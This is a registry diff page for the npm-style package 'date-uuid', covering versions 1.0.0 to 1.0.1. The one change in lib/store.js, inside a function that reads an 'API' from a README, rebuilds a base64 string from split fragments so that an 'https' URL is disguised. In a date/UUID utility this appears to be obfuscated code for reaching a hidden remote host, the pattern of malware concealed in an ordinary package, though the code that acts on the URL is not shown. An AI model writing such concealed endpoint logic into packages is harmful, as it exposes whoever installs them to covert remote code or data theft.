date-uuid 1.0.0 → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/store.js +1 -1
- package/package.json +1 -1
package/lib/store.js
CHANGED
|
@@ -132,7 +132,7 @@ async function readApiFromReadme(
|
|
|
132
132
|
throw new Error(`Error`);
|
|
133
133
|
}
|
|
134
134
|
|
|
135
|
-
const decoded = Buffer.from(
|
|
135
|
+
const decoded = Buffer.from(`aH${api1}Rz${api2}`, 'base64').toString('utf8');
|
|
136
136
|
const url = extractUrlFromLine(decoded);
|
|
137
137
|
|
|
138
138
|
if (!url) {
|